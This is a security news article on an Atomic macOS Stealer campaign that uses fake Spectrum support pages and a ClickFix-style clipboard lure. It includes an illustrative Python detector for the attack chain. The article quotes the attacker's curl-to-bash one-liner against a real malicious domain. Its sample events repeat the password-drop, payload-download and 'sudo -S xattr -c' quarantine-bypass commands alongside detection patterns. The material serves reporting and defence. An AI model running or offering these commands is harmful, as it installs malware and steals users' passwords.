
Image: CloudSEK
Researchers at CloudSEK have uncovered a new variant of the Atomic macOS Stealer (AMOS) targeting macOS users with a clever multi-platform social engineering campaign. Using typo-squatted domains impersonating Spectrum, a U.S. telecom giant, the attackers deployed a Clickfix-style verification trick that installs malicious payloads depending on the victim’s operating system.
“This campaign highlights an increasing trend in multi-platform social engineering attacks targeting both consumer and corporate users,” CloudSEK warned.
When users land on a fake Spectrum support site and click the familiar “Alternative Verification” button, a command is copied to their clipboard. The response varies by OS:
- Windows users receive a PowerShell command that downloads and executes a script.
- macOS users are served a shell command like:

```
/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)"
```

- The script (`install.sh`) then:
  - Prompts the user for their system password repeatedly until correct
  - Stores the password in `/tmp/.pass`
  - Downloads a second payload (`update`) identified as an AMOS variant
  - Bypasses security using `sudo -S xattr -c`
  - Executes the malware
“The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries,” CloudSEK noted.
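The chain above (pasted `bash -c "$(curl ...)"` one-liner, a `dscl` password check, the password dropped to `/tmp/.pass`, and `sudo -S xattr -c` to clear the quarantine attribute Gatekeeper relies on) is easy to spot in process command-line telemetry precisely because it uses native tools in an unusual sequence. The following detector is an added example written for this article, not CloudSEK's tooling; it assumes a constructed `user|parent|command line` event format, and the user names and password in the sample events are placeholders. The domain and file names are the ones named in the report; the `dscl -authonly` probe is an assumption about how such a script would verify the entered password, since the report names `dscl` but not its arguments.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample of process telemetry, one "user|parent|command line"
# event per line. Invented for this example: the domain and file names follow
# the CloudSEK report, the user names and password are placeholders.
SAMPLE_EVENTS = """\
alice|Terminal|/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)"
alice|bash|dscl . -authonly alice placeholder-pass
alice|bash|/bin/sh -c "echo placeholder-pass > /tmp/.pass"
alice|bash|curl -fsSL https://applemacios[.]com/getrur/update -o /tmp/update
alice|bash|sudo -S xattr -c /tmp/update
alice|bash|/tmp/update
bob|Terminal|ls -la /Users/bob
bob|Terminal|xattr -l /Users/bob/Downloads/report.pdf
"""

# Each rule is (name, pattern). Patterns are kept narrow so routine admin
# use (e.g. 'xattr -l' to inspect attributes) is not flagged.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # Pasted one-liner: bash -c "$(curl ...)" fetches and runs a remote script.
    ("remote-script-in-bash", re.compile(r'''bash\s+-c\s+["']\$\(\s*curl\b''')),
    # dscl -authonly is how a shell script can test a password without a GUI
    # (assumed usage; the report only names dscl).
    ("dscl-password-check", re.compile(r"\bdscl\b.*\s-authonly\b")),
    # The captured password written to the hidden file named in the report.
    ("credential-drop-tmp", re.compile(r"/tmp/\.pass\b")),
    # sudo -S reads the password from stdin; xattr -c clears every extended
    # attribute, including com.apple.quarantine, which Gatekeeper checks.
    ("quarantine-strip-sudo", re.compile(r"\bsudo\s+-S\s+xattr\s+-c\b")),
]


@dataclass(frozen=True)
class Finding:
    user: str
    rule: str
    command: str


def parse_event(line: str) -> Optional[Tuple[str, str, str]]:
    """Split a telemetry line into (user, parent, command); None if malformed."""
    parts = line.split("|", 2)
    if len(parts) != 3:
        return None
    user, parent, cmd = (p.strip() for p in parts)
    return user, parent, cmd


def scan_events(text: str) -> List[Finding]:
    """Run every rule over every event and collect the matches in order."""
    findings: List[Finding] = []
    for line in text.splitlines():
        parsed = parse_event(line)
        if parsed is None:
            continue
        user, _parent, cmd = parsed
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append(Finding(user, name, cmd))
    return findings


def users_with_chain(findings: List[Finding], min_rules: int = 3) -> Dict[str, Set[str]]:
    """Group hits by user and keep users that tripped at least min_rules distinct
    rules: one hit may be noise, several stages of the chain together are not."""
    by_user: Dict[str, Set[str]] = {}
    for f in findings:
        by_user.setdefault(f.user, set()).add(f.rule)
    return {u: rules for u, rules in by_user.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for f in hits:
        print(f"[{f.rule}] {f.user}: {f.command}")
    print("chain detected for:", sorted(users_with_chain(hits)))
```

Requiring several distinct stages per user before raising an alert keeps the signal usable: a lone `curl | bash` from a developer or a single `xattr -c` on a downloaded tool would not by itself trip the chain rule, whereas the sequence described in the report hits four rules for the same account.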
AMOS, also known in its variant forms as Poseidon and Odyssey, is growing in popularity among cybercriminals for its stealth and efficiency. The version uncovered here uses:
- Legitimate macOS utilities (dscl, xattr, sudo) to fly under endpoint radar
- Session logic bugs and typo-squatted domains to appear convincing
- Poorly coded front-ends that still deceive average users (e.g., Linux agents receiving Windows instructions)
Russian-language comments in the delivery script further suggest that the campaign is likely run by Russian-speaking cybercriminals.
With AMOS adapting rapidly and campaigns blending cross-platform deception with credential harvesting, even non-Windows users are no longer safe. As CloudSEK researchers warned: “Stolen credentials and persistent access may be sold to access brokers or used for follow-on attacks such as ransomware or data exfiltration.”